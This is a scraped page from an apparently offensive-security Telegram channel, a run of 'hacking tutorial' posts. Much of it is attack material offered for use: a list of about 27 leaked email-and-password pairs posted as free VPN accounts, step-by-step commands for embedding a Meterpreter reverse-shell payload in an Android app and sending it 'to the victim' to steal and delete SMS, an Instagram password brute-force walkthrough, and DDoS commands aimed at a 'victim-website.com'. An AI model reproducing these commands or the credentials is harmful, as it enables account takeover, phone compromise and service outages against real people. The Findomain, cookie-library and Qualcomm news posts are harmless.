UNDERCODE SECURITY
225 subscribers
295 photos
1.03K files
1.73K links
πŸ¦‘WELCOME IN UNDERCODE TESTING FOR LEARN HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOs)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
Download Telegram
Forwarded from UNDERCODE COMMUNITY
Windows for Pentester_ Certutil.pdf
984.9 KB
Windows for Pentester_ Certutil

-What
is certutil? What is Living off Land? -Working with certutil?
- What is Alternative Data Stream (ADS)?
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 Topic Hacking :

F E A T U R E S :

-Subdomains monitoring: put data to Discord, Slack or Telegram

-webhooks. See Subdomains Monitoring for more information.

-Multi-thread support for API querying, it makes that the maximun time that Findomain will take to search subdomains for any target is 15 seconds (in case of API's timeout).

-Parallel support for subdomains resolution, in good network conditions can resolv about 3.5k of subdomains per minute.
DNS over TLS support.

-Specific IPv4 or IPv6 query support.

-Discover subdomains without brute-force, it tool uses Certificate

-Transparency Logs and APIs.

-Discover only resolved subdomains.

-Discover subdomains IP for data analisis.

-Read target from user argument (-t) or file (-f).

-Write to one unique output file specified by the user all or only resolved subdomains.

-Write results to automatically named TXT output file(s).

-Hability to query directly the Findomain database created with
Subdomains Monitoring for previous discovered subdomains.

-Hability to import and work data discovered by other tools.

-Quiet mode to run it silently.

-Cross platform support: Any platform, it's written in Rust and Rust is multiplatform. See the documentation for instructions.

-Multiple API support.

-Possibility to use as subdomain resolver.

-Subdomain wildcard detection for accurate results.

-Support for subdomain discover using bruteforce method.

-Support for configuration file in TOML, JSON, HJSON, INI or YAML format.

-Custom DNS IP addresses for fast subdomains resolving (more than 60 per second by default, adjustable using the --threads option.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) $ git clone https://github.com/Edu4rdSHL/findomain.git -b develop # Only the develop branch is needed

2) $ cd findomain

3) $ cargo build --release

4) $ ./target/release/findomain

5) for linux

> $ chmod +x findomain-linux

> $ ./findomain-linux

C O M P A T I B I L I T Y :

Linux
Windows
MacOS
Aarch64 (Raspberry Pi)
NixOS
Docker

MORE TUTORIALS https://asciinema.org/a/3kHnCYTDsOp20ttgNXXgvCRjX

E N J O Y β€οΈπŸ‘πŸ»
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from Backup Legal Mega
πŸ¦‘NEW NORDVPN PREMIUM :

janetthornhill@aol.com:Somerset1 | Expiration = 2020-08-19 17:56:55
japurcell@aol.com:Rnixon12 | Expiration = 2022-01-17 01:39:03
jaredkahl22@gmail.com:Kahl4ever | Expiration = 2022-04-25 03:04:17
jasonaust02@gmail.com:Ja062895 | Expiration = 2020-08-09 23:17:05
jasonmpeters@live.com:Crfhonda08 | Expiration = 2020-10-14 00:00:00
jasonstevenson1984@gmail.com:Wesley8372 | Expiration = 2020-09-23 21:20:04
jasperkibzey@gmail.com:trueblue24 | Expiration = 2022-10-08 20:35:16
jasrasmussen@gmail.com:Joshua88 | Expiration = 2022-05-02 18:28:08
jaycobtharp@gmail.com:4Jaycob4 | Expiration = 2021-07-15 16:41:31
jayhill_jeromehill@yahoo.com:dragonballz | Expiration = 2020-11-20 01:53:06
jessonmoen@gmail.com:Surfer22 | Expiration = 2021-04-15 19:23:39
jessshankland@googlemail.com:jess3107 | Expiration = 2020-08-03 11:46:05
jessyc09@yahoo.com:ladybug05 | Expiration = 2022-03-09 23:31:28
jessylivingstone@rogers.com:bazooka123 | Expiration = 2020-12-03 07:47:03
jesusjrsanchez17@gmail.com:pandaskill4fun | Expiration = 2023-03-04 09:20:16
jf3333@yahoo.com:6382joel | Expiration = 2020-10-01 14:12:54
jim1.west@comcast.net:Nathan2@ | Expiration = 2021-11-23 22:40:42
jimandamita@mac.com:daswamy1 | Expiration = 2025-01-31 17:43:50
jimenez.michael@live.com:Suckit02!x | Expiration = 2021-11-23 01:10:14
jjfiore@aol.com:Alana124 | Expiration = 2021-01-05 02:28:56
jjsrabbit@yahoo.com:redsox0987 | Expiration = 2020-08-08 02:47:24
jkuipers2017@fau.edu:Boodlebag311 | Expiration = 2020-08-22 22:35:09
jlaicans@yahoo.com:ytellu911 | Expiration = 2020-08-21 16:26:59
jlouns@hotmail.com:Culloden1746 | Expiration = 2022-09-26 03:34:20
jm-perez@att.net:Zerg1122 | Expiration = 2022-08-18 22:34:22
jmc66@mac.com:Scotland66! | Expiration = 2022-04-04 19:19:21
jmdesena@att.net:Duke1225! | Expiration = 2020-09-22 17:14:13
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Sniffer may cause harm:

1) The sniffer can capture passwords

2) It can capture private or confidential information

3) It can be used to compromise the security of network neighbors, or to obtain higher-level access rights.

> In fact, If you have an unauthorized sniffer on the network, you think your system has been exposed to others. (You can try the sniffing function of Skyline 2)

4) Generally, we only sniff the first 200 to 300 bytes of each message. The username and password are included in this part, which is the real part we care about. Workers can also sniff all the packets on a given interface. If there is enough space for storage and enough for processing, they will find other very interesting things...

@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘HACK INSTAGRAM WITH LINUX OS :

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) git clone https://github.com/Ethical-H4CK3R/Instagram.git

2) chmod -R 755 Instagram && cd Instagram

3) python instagram.py

4)get any wordlist example :

> > https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm

> http://www.insidepro.team/

> https://wiki.skullsecurity.org/Passwords

> https://github.com/danielmiessler/SecLists/tree/master/Passwords

> https://github.com/berzerk0/Probable-Wordlists

> https://github.com/topics/password-cracking

(up to 12 Gb wordlists)

5) install Tor with: sudo apt-get install tor

6) python instagram.py Username wordlist.txt

E N J O Y β€οΈπŸ‘πŸ»
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘HACK WHATSAPP VIA LINUX-PARROT/KALI/UBUNTU :

A ) Install requirements :

1) apt
-get install lib32stdc++6 lib32ncurses5 lib32z1

2) git clone https://github.com/SkullTech/apk-payload-injector

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

3) choose the APK PAYLOAD - recommended any cleaner apk

4) make sure to place both of the apk and the script you downloaded earlier in the same directory

5)type in terminal :

> ruby apk-embed-payload.rb cleanerapk.apk -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.x.xxx LPORT=xxxx

6)now type :
> msfconsole

7) type in terminal :

> use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST {local ip to listen on}
set LPORT {the port you set earlier}
exploit

8) now send the apk to the victim :))

9) after installing β€”β€”->> use the command drop_sms

10) recommended :
root the phone and simply spoof the MAC adress using a terminal, download from playstore like termux


11) to delet the android sms db use this command :

> delete data/data/com.android.providers.telephony/databases/mmssms.db

E N J O Y β€οΈπŸ‘πŸ»
written by @medusaU
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘TOP TWITTER HACKING 2020 :
windows-linux

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) sudo
apt install python-pip python-dev build-essential python2.7-dev python-pyexiv2 python-openssl

2) sudo pip install --upgrade pip

3) sudo pip install --upgrade virtualenv

4) sudo pip install --upgrade tweepy

5) sudo pip install --upgrade pillow

6) sudo pip install --upgrade exifread

7) sudo pip install --upgrade jinja2

8) sudo pip install --upgrade oauth2

9)download or clone https://github.com/vaguileradiaz/tinfoleak

10) Edit "tinfoleak.conf"

11) Use your favorite editor ;-)

12) Give value to these variables:
CONSUMER_KEY
CONSUMER_SECRET
ACCESS_TOKEN
ACCESS_TOKEN_SECRET

13) How to obtain these values:
https://developer.twitter.com/en/docs/basics/authentication/guides/access-tokens
Save "tinfoleak.conf"
Execute "tinfoleak.py"

E N J O Y β€οΈπŸ‘πŸ»
U S E F O R L E A R N
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘HTTP-FLOOD TOPIC (TERMUX/LINUX)
Wreckuests is a script, which allows you to run DDoS attacks with HTTP-flood(GET/POST). It's written in pure Python and uses proxy-servers as "bots". OF COURSE, this script is not universal and you can't just drop Pentagon/NSA/whatever website with just a single mouse click. Each attack is unique, and for each website you'd need to search for vulnerabilities and exult them.

F E T U R E S :

-Cache bypass with URL parameters randomization
-CloudFlare detection and notification of
-Automatic gzip/deflate toggling
-HTTP Authentication bypass
-UserAgent substitution
-Referers randomizer
-HTTP proxy support

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1
) https://github.com/JamesJGoodwin/wreckuests.GIT

2) chmod +x install.sh

3) ./install.sh

REQUIRE ROOT FOR TERMUX USERS

4) python3 wreckuests.py -v <target url> -a <login:pass> -t <timeout>

E N J O Y β€οΈπŸ‘πŸ»
U S E F O R L E A R N
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘updated 2020 node.js module for getting and setting HTTP(S) cookies
> Cookies can be signed to prevent tampering, using Keygrip. It can be used with the built-in node.js HTTP library, or as Connect/Express middleware.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) open open any debian base terminal and type
> npm install

2) $ npm install cookies

3) express.createServer( Cookies.express( keys ) )

>This adds cookie support as a Connect middleware layer for use in Express apps, allowing inbound cookies to be read using req.cookies.get and outbound cookies to be set using res.cookies.set.

4) full usage on: https://github.com/pillarjs/cookies

πŸ¦‘ F E A T U R E S :

1) Lazy: Since cookie verification against multiple keys could be expensive, cookies are only verified lazily when accessed, not eagerly on each request.

2) Secure: All cookies are httponly by default, and cookies sent over SSL are secure by default. An error will be thrown if you try to send secure cookies over an insecure socket.

3) Unobtrusive: Signed cookies are stored the same way as unsigned cookies, instead of in an obfuscated signing format. An additional signature cookie is stored for each signed cookie, using a standard naming convention (cookie-name.sig). This allows other libraries to access the original cookies without having to know the signing mechanism.

4) Agnostic: This library is optimized for use with Keygrip, but does not require it; you can implement your own signing scheme instead if you like and use this library only to read/write cookies. Factoring the signing into a separate library encourages code reuse and allows you to use the same signing library for other areas where signing is needed, such as in URLs.

E N J O Y β€οΈπŸ‘πŸ»
U S E F O R L E A R N
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Qualcomm confirms that Snapdragon DSP flaws can expose 40% of smartphones to hackers :
#news

>Qualcomm has confirmed that it has found a huge flaw in their smartphone chipset, leaving the phone completely exposed to hackers. The vulnerability was discovered by Check Point security company. A large number of flaws in the Snapdragon DSP in Android phones can allow hackers to steal data, install hidden spyware that is difficult to find, and even completely damage the phone and make it unusable.

> Check Point publicly disclosed this flaw on Pwn2Own, revealing that the security setting of the DSP in the built-in Qualcomm Snapdragon processor phone was easily bypassed, and 400 exploitable flaws were found in the code.

> For security reasons, cDSP is authorized to OEM manufacturers and limited third-party software vendors for programming. The code running on the DSP is signed by Qualcomm. The security agency successfully demonstrated how Android applications can bypass Qualcomm’s signature and execute privileged code on the DSP, and what further security issues this will cause.. (check picture here after this telegram post)

> Hexagon SDK is the official way to prepare DSP-related code for manufacturers. Its SDK has serious bugs, which leads to hundreds of hidden vulnerabilities in Qualcomm's own and manufacturer codes. In fact, almost all DSP executable libraries embedded in Qualcomm-based smart phones will be attacked due to problems with the Hexagon SDK, and the resulting and exposed security vulnerabilities can be exploited by hackers.

#news
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘FASTEST DDOS FOR TERMUX -2020

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) Open Terminal in Kali Linux or Termux in Android

2) mkdir ddos

3) cd ddos

4) pkg install python2

5) pkg install git

6) git clone https://github.com/jseidl/GoldenEye.git

7) cd GoldenEye/

8) ./goldeneye.py victim-website.com

9) python2 ./goldeneye.py victim-website.com

10) Add values for workers (-w), sockets (-s) and method (-m)
./goldeneye.py victim-website.com -w 100 -s 70 -m post

USE FOR LEARN
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁